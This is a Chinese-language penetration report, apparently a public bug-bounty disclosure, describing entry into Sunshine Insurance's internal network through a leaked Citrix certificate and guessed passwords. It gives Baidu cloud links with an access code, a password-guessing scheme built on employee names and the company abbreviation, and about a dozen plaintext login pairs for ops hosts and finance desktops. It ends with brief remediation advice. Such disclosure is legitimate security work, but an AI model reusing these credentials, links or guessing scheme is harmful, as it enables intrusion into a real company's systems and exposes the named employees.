阳光保险敏感信息泄露导致成功进入内网系统(直登多台运维主机)

等了这么久还是有结果的啊.

之前遇到的证书问题得以解决 又爆破了几个账号

他上传了最新5月31号证书 又看到他每隔1段时间就上传证书 想必证书是按服务端有限期的

http://pan.baidu.com/share/home?uk=3257785095#category/type=0

#1将证书导入成信任根证书

下载 citrix xenapp 应用

链接：http://pan.baidu.com/s/1cFRWJk 密码：67k9

#1进入内网OA

此百度云地址弄清楚是谁的吧

爆破思路:

首先如果要进入运维 财务等桌面结尾必定 ghq

利用目前资源 ygbx和他本身姓名可作为密码条件之一 结合之前的漏洞

返回339则成功

login=yangli-ghq&passwd=ygbx321! --经代车商系统

login=zhangjianmin-ghq&passwd=ygbx123# --财务移动办公

运维主机

login=lijing-ghq&passwd=lijing123!

login=zhouwei-ghq&passwd=zhouwei123!

login=wangdan-ghq&passwd=wangdan123!

login=xieli-ghq&passwd=xieli123!

财务桌面

login=zhangdan-ghq&passwd=zhangdan321!

login=liyun-ghq&passwd=liyun123!

无权限号

login=chenwei-ghq&passwd=ygbx123@

login=lidandan-ghq&passwd=ygbx123@

login=zhaowei-ghq&passwd=ygbx123#

登录各大系统

登录财务桌面

login=zhangdan-ghq&passwd=zhangdan321!

登录某运维人员桌面

login=lijing-ghq&passwd=lijing123!

oralce数据库没关

解决方案：

1.员工安全意识问题

2.弱口令问题(不要设置和用户名,公司名等简单密码组合)

3.远程计算机 数据库等操作下机请关闭

4.本次渗透,没有动任何主机数据